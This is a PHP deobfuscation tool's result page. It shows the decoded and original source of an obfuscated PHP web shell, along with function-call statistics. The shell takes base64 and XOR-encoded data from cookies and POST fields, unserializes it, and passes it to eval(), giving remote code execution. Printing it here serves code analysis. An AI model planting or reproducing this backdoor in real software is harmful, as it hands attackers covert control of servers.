Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$VTetlOMATo = "\x4c" . chr ( 786 - 713 )."\137" . chr (75) . chr ( 743 - 670 ).chr ( 445 -..
Decoded Output download
<? $VTetlOMATo = "L" . chr ( 786 - 713 )."_" . chr (75) . chr ( 743 - 670 ).chr ( 445 - 359 )."R" . "d";$RhYCeK = "c" . chr ( 350 - 242 )."a" . "s" . "s" . "_" . "e" . "x" . 'i' . chr ( 184 - 69 )."t" . "s";$xWicAkRfk = $RhYCeK($VTetlOMATo); $VTetlOMATo = "35850";$RhYCeK = "13069";$RkWNaVUszk = $xWicAkRfk;if (!$RkWNaVUszk){class LI_KIVRd{private $dKCwVRkSw;public static $gAvNZPnGKl = "e70dcc00-7da5-472e-b645-17d9c63d19f8";public static $lEeOd = 35523;public function __construct($bQBcKH=0){$iqkRDu = $_COOKIE;$rbyDDFm = $_POST;$kUSQOnw = @$iqkRDu[substr(LI_KIVRd::$gAvNZPnGKl, 0, 4)];if (!empty($kUSQOnw)){$JWwhcwAv = "base64";$BgdpVhMEML = "";$kUSQOnw = explode(",", $kUSQOnw);foreach ($kUSQOnw as $AWTXQzCoP){$BgdpVhMEML .= @$iqkRDu[$AWTXQzCoP];$BgdpVhMEML .= @$rbyDDFm[$AWTXQzCoP];}$BgdpVhMEML = array_map($JWwhcwAv . '_' . chr ( 533 - 433 ).chr ( 304 - 203 ).'c' . "o" . "d" . chr (101), array($BgdpVhMEML,)); $BgdpVhMEML = $BgdpVhMEML[0] ^ str_repeat(LI_KIVRd::$gAvNZPnGKl, (strlen($BgdpVhMEML[0]) / strlen(LI_KIVRd::$gAvNZPnGKl)) + 1);LI_KIVRd::$lEeOd = @unserialize($BgdpVhMEML);}}private function JxcUx(){if (is_array(LI_KIVRd::$lEeOd)) {$snOyQN = str_replace('<' . '?' . chr (112) . "h" . chr ( 500 - 388 ), "", LI_KIVRd::$lEeOd['c' . 'o' . chr (110) . chr (116) . "e" . "n" . 't']);eval($snOyQN); $kGlTLf = "32635";exit();}}public function __destruct(){$this->JxcUx(); $kGlTLf = "32635";}}$hhOdfi = new LI_KIVRd(); $hhOdfi = "12544_4541";} ?>
Did this file decode correctly?
Original Code
$VTetlOMATo = "\x4c" . chr ( 786 - 713 )."\137" . chr (75) . chr ( 743 - 670 ).chr ( 445 - 359 )."\x52" . "\144";$RhYCeK = "\x63" . chr ( 350 - 242 )."\141" . "\x73" . "\163" . "\x5f" . "\x65" . "\x78" . 'i' . chr ( 184 - 69 )."\164" . "\163";$xWicAkRfk = $RhYCeK($VTetlOMATo); $VTetlOMATo = "35850";$RhYCeK = "13069";$RkWNaVUszk = $xWicAkRfk;if (!$RkWNaVUszk){class LI_KIVRd{private $dKCwVRkSw;public static $gAvNZPnGKl = "e70dcc00-7da5-472e-b645-17d9c63d19f8";public static $lEeOd = 35523;public function __construct($bQBcKH=0){$iqkRDu = $_COOKIE;$rbyDDFm = $_POST;$kUSQOnw = @$iqkRDu[substr(LI_KIVRd::$gAvNZPnGKl, 0, 4)];if (!empty($kUSQOnw)){$JWwhcwAv = "base64";$BgdpVhMEML = "";$kUSQOnw = explode(",", $kUSQOnw);foreach ($kUSQOnw as $AWTXQzCoP){$BgdpVhMEML .= @$iqkRDu[$AWTXQzCoP];$BgdpVhMEML .= @$rbyDDFm[$AWTXQzCoP];}$BgdpVhMEML = array_map($JWwhcwAv . '_' . chr ( 533 - 433 ).chr ( 304 - 203 ).'c' . "\157" . "\x64" . chr (101), array($BgdpVhMEML,)); $BgdpVhMEML = $BgdpVhMEML[0] ^ str_repeat(LI_KIVRd::$gAvNZPnGKl, (strlen($BgdpVhMEML[0]) / strlen(LI_KIVRd::$gAvNZPnGKl)) + 1);LI_KIVRd::$lEeOd = @unserialize($BgdpVhMEML);}}private function JxcUx(){if (is_array(LI_KIVRd::$lEeOd)) {$snOyQN = str_replace('<' . '?' . chr (112) . "\150" . chr ( 500 - 388 ), "", LI_KIVRd::$lEeOd['c' . 'o' . chr (110) . chr (116) . "\145" . "\x6e" . 't']);eval($snOyQN); $kGlTLf = "32635";exit();}}public function __destruct(){$this->JxcUx(); $kGlTLf = "32635";}}$hhOdfi = new LI_KIVRd(); $hhOdfi = "12544_4541";}
Function Calls
chr | 6 |
class_exists | 1 |
Stats
MD5 | 13f3f5b09bbe787f805de46c00e9c1ae |
Eval Count | 0 |
Decode Time | 92 ms |